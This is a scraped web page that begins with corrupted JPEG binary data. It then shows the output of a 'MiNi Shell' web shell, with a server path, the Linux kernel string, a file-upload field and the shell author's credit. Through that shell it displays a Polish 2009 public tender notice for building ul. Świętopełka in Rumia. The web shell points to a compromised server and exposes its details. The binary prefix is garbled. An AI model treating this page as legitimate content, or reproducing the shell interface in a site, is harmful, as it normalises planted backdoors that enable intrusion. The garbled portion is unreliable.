JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/43259-N-2009.html

<p class="kh_header"><b>Rumia: Budowa ul Świętopełka w Rumi</b><br>
<b>Numer ogłoszenia: 43259 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul Świętopełka w Rumi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa ul. Świętopełka na odcinku od ul. Dębogórskiej do ul. Mostowej w Rumi w zakresie obejmującym wykonanie następujących robót: 
           1) roboty rozbiórkowe + wywóz i utylizacja:
      a)     rozebranie nawierzchni z mieszanek min.-bitumicznych -  115,00 m2,
b)	rozbiórka naw. z kostki bet. - chodnik  -  345,00 m2,
c)	rozbiórka naw. z kostki bet. - jezdnia  -  490,00 m2,
d)	rozbiórka ław pod krawężniki betonowe -  25,06 m2,
e)	rozbiórka kraw. 15 x 30 cm na podsypce cem.-piask. (odzysk) - 208,00 m2, 
f)	rozbiórka krawężników bet. 15 x 30 cm  -  150,00 m2,
g)	rozbiórka naw. z płyt betonowych  -  239,00 m2,
h)	rozbiórka ogrodzenia -siatka na obetonowanych słupkach - 863,00 m2,  
i)	rozbiórka ogrodzenia - siatka na słupkach żelbet.(w gruncie ) - 196,0 m2, 
j)	rozbiórka bram z siatki w ramach stalowych - 87,00 m2,
k)	wycinka drzew (śr.66-75 cm)  - 8 szt.,
l)	wycinka drzew(0,31-0,5cm) - 10 szt.,                                                                                

           2) roboty drogowe:
a)	wykonanie nawierzchni jezdni i wjazdów z. kostki bet. 8 - 3 034,00 m2,
b)	wbudowanie krawężników betonowych 15 x 30 cm  -  994,0 mb,
c)	wbudowanie krawężników bet. wtopionych 12 x 25 cm  -  369,00 mb, 
d)	wykonanie chodników z kostki bet. 6  -  1 208,00 m2,
e)	wbudowanie obrzeży betonowych  8 x 30 cm  - 703,00 mb,
f)	wykonanie wzmocnienia podłoża geowłókniną   - 3768,00 m2,  
g)	wykonanie plantowania i humusowania wraz z obsianiem skarp  -  804,00 m2,

           3) kanalizacja deszczowa:
a)	wybudowanie kanałów z rur PVC o 400 mm  -  237,80 m, 
b)	wybudowanie kanałów z rur PVC o 300 mm  - 339,00 m,
c)	wybudowanie kanałów z rur PCV o 250 mm - 26,40 m,
d)	montaż wpustów ulicznych  o 500 mm ryglowane z koszami  - 18 szt., 
e)	wybudowanie studni rewizyjnych o 1200 mm z płytą, włazem D 400
              i osadnikiem  - 27 szt. 

   4) sieć wodociągowa:
a)	wykonanie wodociągu z rur PE, PEHD o 110 mm  -  595,00 m,                                                               
b)	wykonanie wodociągu z rur j.w.   o 160 mm - 12,00 m,
c)	montaż hydrantu podziemnego DN 80  -  4 kpl.,
d)	montaż zasuw  o 100 i o 50  - montaż - 24 kpl.,
e)	demontaż rurociągu żeliwnego o 100 m  - 94,00 m.,

5) sieć gazowa:
a)	wykonanie gazociągu z rur stalowych HFW DN 100 - 36,00 m,
b)	wykonanie gazociągu z rur j.w. DN 150   - 50,00 m,
c)	montaż na gazociągu rur ochronnych stalowych DN 250  - 15,00 m,
d)	montaż na gazociągu rur j.w.  DN 200 -  17,00 m,
e)	montaż sączka węchowego  -  4  kpl.,
f)	montaż monobloku DN 150  - 1 kpl.,

   6) przebudowa sieci telekomunikacyjnej TP S.A.:
a)  demontaż sieci tel. rozdzielczej  - 105,00 m,   
b)	budowa sieci tel. rozdzielczej   -  93,00 m,
  
  7) przebudowa sieci telekomunikacyjnej NETIA S.A.:
a)     demontaż kanalizacji kablowej TP S.A. - 113,00 m,   
b)	budowa kanalizacji kablowej NETIA S.A.  - 116,00 m,
c)	demontaż i montaż kabla  -  70,00 m,
d)	wbudowanie kabla światłowodowego  -  265,00 m.  

8) przebudowa linii kablowej SN 15 kV:
a)	ułożenie linii kablowych SN 15 kV  - 90,00 m,
b)	montaż rur osłonowych  - 6,00 m,

          9)  przebudowa linii kablowej nn:
a)	ułożenie rur osłonowych PCV  - 132,00 m,
b)	ułożenie bednarek   - 390,00 m,
c)	ułożenie kabla YAKY 4 x 120 - 361,00 m,
d)	ułożenie kabla YAKY  4 x 35  - 26,00 m,

       10)   przebudowa linii napowietrznej nn:
a)	demontaż i montaż linii nn - 750,00 m,   
b)	demontaż i montaż  słupów linii nn  - 2 szt.,
c)	montaż opraw i wysięgników   - 4  szt.,

 11) urządzenia bezpieczeństwa ruchu:
a)	oznakowanie pionowe  - montaż słupków z rur stalowych - 26 szt.,
	    - montaż znaków i tablic - 28 szt.,
	    - regulacja studzienek sygnalizacji św. - 2 szt.,
   b)     wykonanie oznakowania poziomego cienkowarstwowego  -  50,00 m2,

 12) ogrodzenie: 
        - wykonanie ogrodzenia   - z siatki na słupach stalowych obetonowanych - 731,00 m,    
	                   - z siatki na słupach żelbetowych -  43,20 m,
	                   - z kątowników na podmurówce  - 168,00 m,
	                   - z elementów prefabrykowanych żelbet. - 19,80 m2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.00.00-1, 45.11.10.00-8, 45.23.21.30-2, 45.23.14.00-9, 45.31.61.10-9, 45.23.12.20-3, 45.23.13.00-8, 45.23.23.20-1, 45.23.23.10-8, 45.11.27.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 25000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp;
5)	udzielą gwarancji na przedmiot zamówienia na okres 36 miesięcy;
6)	wyrażają zgodę na wszystkie warunki określone w SIWZ oraz projekcie umowy.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
    Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów, według formuły spełnia-niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp składa następujące dokumenty:
1)	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy pzp oraz oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 pzp.;
2)	Pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik; 
3)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed dniem składania ofert.
4)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
          Warunki wymienione w części A pkt 1, 3, 4, 5 i 6 mają zastosowanie do wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, natomiast wymagania wymienione w części A pkt 2 wykonawcy spełniają łącznie.

B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
      1) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, kontraktów o charakterze odpowiadającym przedmiotowi zamówienia tj. budowie dwóch nawierzchni drogowych z kostki betonowej o pow. co najmniej 2.500 m2 i wartości nie mniejszej niż 1.000.000,00 zł brutto każdy, oraz dwóch kontraktów polegających na wykonaniu sieci kanalizacji deszczowej o długości co najmniej 400 mb i wartości każdego z nich nie mniejszej niż 300.000 zł, z podaniem daty i miejsca ich wykonania (kontrakty mogą być łączne)
2)	wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (z załączeniem uprawnień budowlanych dla kierownictwa budowy branży drogowej i kierowników robót branży sanitarnej, elektrycznej, gazowej i telekomunikacyjnej oraz zaświadczeń o wpisie na listę członków Okręgowej Izby Inżynierów Budownictwa);
3)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
zamówienia, jeżeli w wykazie, o którym mowa w pkt 2, wykonawca wskazał osoby, którymi będzie  dysponował; 


Warunki wymienione w części  B wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają łącznie.

C. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
-	dowód wpłaty wadium;
-	polisę, a w przypadku jej braku inny dokument potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Suma gwarancyjna w zakresie prowadzonych robót (kontraktowa) oraz szkód rzeczowo-finansowych (deliktowa) nie może być niższa niż 1.000.000,00 zł.  
Warunki wymienione w pkt C wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają łącznie. 

D. Inne dokumenty lub oświadczenia:
1)	wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1;
2)	szczegółowy kosztorys ofertowy - szczegółowa wycena poszczególnych robót wraz ze spisem i kosztami koniecznymi do ich wykonania materiałów, robocizny i sprzętu.

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
  - Oferta winna zawierać: oświadczenia i dokumenty opisane w tekście w części A, B, C i D..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rumia.eu                                   (BIP - zamówienia publiczne - przetargi aktualne).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, Pokój nr 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 12:30, miejsce: Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, Pokój nr 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com